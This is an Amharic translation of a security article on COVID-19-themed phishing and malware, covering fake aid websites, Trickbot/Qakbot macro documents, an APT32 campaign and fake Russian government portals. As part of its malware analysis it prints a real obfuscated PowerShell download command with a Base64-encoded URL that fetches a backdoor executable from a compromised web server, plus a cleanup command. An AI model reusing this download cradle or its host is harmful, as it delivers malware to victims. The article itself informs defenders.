አጥቂዎች የኮቪድ-19ን ርዕስ መጠቀማቸውን ቀጥለዋል፣ከወረርሽኙ ጋር በተያያዙት ነገሮች ሁሉ ላይ ከፍተኛ ፍላጎት ላላቸው ተጠቃሚዎች ተጨማሪ እና ተጨማሪ ስጋቶችን እየፈጠሩ። ውስጥ በኮሮና ቫይረስ ምክንያት ምን አይነት ማልዌር እንደተከሰቱ አስቀድመን ተናግረናል፣ እና ዛሬ ሩሲያን ጨምሮ በተለያዩ ሀገራት ያሉ ተጠቃሚዎች ስላጋጠሟቸው የማህበራዊ ምህንድስና ቴክኒኮች እንነጋገራለን። አጠቃላይ አዝማሚያዎች እና ምሳሌዎች በቆራጩ ስር ናቸው.
ውስጥ አስታውስ ሰዎች ስለ ኮሮናቫይረስ እና ስለ ወረርሽኙ ሂደት ብቻ ሳይሆን ስለ የገንዘብ ድጋፍ እርምጃዎች ለማንበብ ፈቃደኞች መሆናቸውን ተነጋገርን? ጥሩ ምሳሌ እነሆ። በሰሜን ራይን ዌስትፋሊያ ወይም ኤንአርደብሊውው በጀርመን ግዛት ውስጥ አስደሳች የማስገር ጥቃት ተገኘ። አጥቂዎቹ የኤኮኖሚ ሚኒስቴር ድህረ ገጽ ቅጂዎችን ፈጥረዋል () ማንኛውም ሰው ለገንዘብ እርዳታ ማመልከት የሚችልበት። እንዲህ ዓይነቱ ፕሮግራም በእርግጥ አለ, እና ለአጭበርባሪዎች ጠቃሚ ሆኖ ተገኝቷል. የተጎጂዎቻቸውን የግል መረጃ በመቀበል በእውነተኛው ሚኒስቴር ድረ-ገጽ ላይ ማመልከቻ አቅርበዋል, ነገር ግን ሌሎች የባንክ ዝርዝሮችን አመልክተዋል. እንደ ኦፊሴላዊው መረጃ ከሆነ እቅዱ እስኪገኝ ድረስ 4 ሺህ እንደዚህ ያሉ የውሸት ጥያቄዎች ቀርበዋል ። በዚህም ምክንያት ለተጎዱ ዜጎች የታሰበ 109 ሚሊዮን ዶላር በአጭበርባሪዎች እጅ ወደቀ።
ለኮቪድ-19 ነፃ ምርመራ ይፈልጋሉ?
ሌላው የኮሮና ቫይረስ ጭብጥ ማስገር ምሳሌ ነው። በኢሜል ውስጥ. መልእክቶቹ ለኮሮና ቫይረስ ኢንፌክሽን ነፃ ምርመራ እንዲያደርጉ በቀረበላቸው ጥያቄ የተጠቃሚዎችን ትኩረት ስቧል። በእነዚህ አባሪ ውስጥ የTrickbot/Qakbot/Qbot አጋጣሚዎች ነበሩ። እናም ጤንነታቸውን ለመመርመር የሚፈልጉ ሰዎች “የተያያዘውን ቅጽ መሙላት” ሲጀምሩ ተንኮል አዘል ስክሪፕት ወደ ኮምፒዩተሩ ወረደ። እና የአሸዋ ቦክስ ሙከራን ለማስቀረት, ስክሪፕቱ ዋናውን ቫይረስ ማውረድ የጀመረው ከተወሰነ ጊዜ በኋላ ነው, የጥበቃ ስርዓቶች ምንም አይነት ተንኮል አዘል እንቅስቃሴ እንደማይፈጠር እርግጠኛ ሲሆኑ.
አብዛኛዎቹ ተጠቃሚዎች ማክሮዎችን እንዲያነቁ ማሳመንም ቀላል ነበር። ይህንን ለማድረግ አንድ መደበኛ ብልሃት ጥቅም ላይ ውሏል-መጠይቁን ለመሙላት በመጀመሪያ ማክሮዎችን ማንቃት ያስፈልግዎታል, ይህ ማለት የ VBA ስክሪፕት ማሄድ ያስፈልግዎታል.
እንደምታየው፣ የቪቢኤ ስክሪፕት በተለይ ከጸረ-ቫይረስ ተሸፍኗል።
ዊንዶውስ ነባሪውን "አዎ" የሚለውን መልስ ከመቀበሉ በፊት አፕሊኬሽኑ የሚጠብቅበት /T < ሰከንድ > የመጠበቅ ባህሪ አለው። በእኛ ሁኔታ፣ ጊዜያዊ ፋይሎችን ከመሰረዝዎ በፊት ስክሪፕቱ 65 ሰከንድ ጠብቋል።
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
እና በመጠባበቅ ላይ እያለ ማልዌር ወርዷል። ለዚህ ልዩ የPowerShell ስክሪፕት ተጀምሯል፡-
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
የBase64 እሴትን ከፈታ በኋላ፣የPowerShell ስክሪፕት ከዚህ ቀደም በተጠለፈው ከጀርመን የድር አገልጋይ ላይ የሚገኘውን የኋላ በር ያወርዳል፡
http://automatischer-staubsauger.com/feature/777777.pngእና በስሙ ያስቀምጠዋል:
C:UsersPublictmpdirfile1.exe
አቃፊ ‘C:UsersPublictmpdir’ ትዕዛዙን የያዘውን 'tmps1.bat' ፋይል ሲያሄድ ይሰረዛል cmd /c mkdir ""C:UsersPublictmpdir"".
በመንግስት ኤጀንሲዎች ላይ ያነጣጠረ ጥቃት
በተጨማሪም የFireEye ተንታኞች በቅርቡ በ Wuhan የመንግስት መዋቅሮች ላይ ያነጣጠረ የAPT32 ጥቃት እንዲሁም በቻይና የድንገተኛ አደጋ አስተዳደር ሚኒስቴር ሪፖርት አድርገዋል። ከተሰራጨው RTF አንዱ ወደ ኒው ዮርክ ታይምስ መጣጥፍ አገናኝ ይዟል . ነገር ግን፣ ሲያነብ፣ ማልዌር ወርዷል (የFireEye ተንታኞች ምሳሌውን METALJACK ብለው ለይተውታል።)
የሚገርመው ነገር፣ በተገኘበት ጊዜ፣ ቫይረሱ ቶታል እንዳለው ከሆነ አንዳቸውም ጸረ-ቫይረስ ይህንን አጋጣሚ አላገኙም።
ኦፊሴላዊ ድረ-ገጾች ሲቀሩ
በጣም የሚያስደንቀው የማስገር ጥቃት ምሳሌ ባለፈው ቀን ሩሲያ ውስጥ ተከስቷል። ይህ የሆነበት ምክንያት ከ 3 እስከ 16 ዓመት ለሆኑ ህጻናት ለረጅም ጊዜ ሲጠበቅ የነበረው ጥቅም መሾም ነው. በሜይ 12፣ 2020 ማመልከቻዎችን መቀበል መጀመሩ ሲታወጅ፣ሚሊዮኖች ለረጅም ጊዜ ሲጠበቅ የነበረው እርዳታ ለማግኘት ወደ የስቴት አገልግሎቶች ድህረ ገጽ በፍጥነት ሮጡ እና ፖርታሉን ከፕሮፌሽናል DDoS ጥቃት የባሰ አልነበረም። ፕሬዝዳንቱ "የመንግስት አገልግሎቶች የመተግበሪያዎችን ፍሰት መቋቋም አልቻሉም" ሲሉ ሰዎች ማመልከቻዎችን ለመቀበል አማራጭ ጣቢያ ስለመጀመሩ በመስመር ላይ ማውራት ጀመሩ.
ችግሩ ብዙ ጣቢያዎች በአንድ ጊዜ መስራት መጀመራቸው ነው, እና አንዱ, በ posobie16.gosuslugi.ru ላይ ያለው እውነተኛው, መተግበሪያዎችን ይቀበላል, የበለጠ .
የፍለጋ ኢንፎርም ባልደረቦች በ .ru ዞን ውስጥ ወደ 30 የሚጠጉ አዳዲስ የተጭበረበሩ ጎራዎችን አግኝተዋል። የኢንፎሴኩሪቲ እና ሶፍትላይን ኩባንያ ከሚያዝያ ወር መጀመሪያ ጀምሮ ከ70 በላይ ተመሳሳይ የሀሰት የመንግስት አገልግሎት ድረ-ገጾችን ተከታትሏል። ፈጣሪዎቻቸው የታወቁ ምልክቶችን ያካሂዳሉ እንዲሁም ጎሱሉጊ ፣ ጎሱሱሉጊ-16 ፣ ቪፕላቲ ፣ ኮቪድ-ቪፕላቲ ፣ posobie እና የመሳሰሉትን ቃላት ጥምረት ይጠቀማሉ።
ሃይፕ እና ማህበራዊ ምህንድስና
እነዚህ ሁሉ ምሳሌዎች አጥቂዎች የኮሮና ቫይረስን ርዕስ በተሳካ ሁኔታ ገቢ እየፈጠሩ መሆናቸውን ብቻ ያረጋግጣሉ። እና ማህበራዊ ውጥረቱ ከፍ ባለ ቁጥር እና የበለጠ ግልፅ ያልሆኑ ጉዳዮች ፣ አጭበርባሪዎች ጠቃሚ መረጃዎችን ለመስረቅ ፣ ሰዎች ገንዘባቸውን በራሳቸው እንዲሰጡ ለማስገደድ ወይም ብዙ ኮምፒተሮችን ለመጥለፍ እድሉ ይጨምራል።
እና ወረርሽኙ ያልተዘጋጁ ሊሆኑ የሚችሉ ሰዎችን ከቤት በጅምላ እንዲሰሩ ስላስገደዳቸው የግል ብቻ ሳይሆን የድርጅት መረጃም አደጋ ላይ ነው። ለምሳሌ፣ በቅርብ ጊዜ የማይክሮሶፍት 365 (የቀድሞው Office 365) ተጠቃሚዎች እንዲሁ የማስገር ጥቃት ደርሶባቸዋል። ሰዎች ከደብዳቤዎች ጋር እንደ አባሪ ትልቅ "ያመለጡ" የድምጽ መልዕክቶችን ተቀብለዋል። ነገር ግን፣ ፋይሎቹ የጥቃቱ ተጎጂዎችን የላከ የኤችቲኤምኤል ገጽ ነበሩ። . በውጤቱም, የመዳረሻ መጥፋት እና ሁሉንም ውሂብ ከመለያው መጣስ.
ምንጭ: hab.com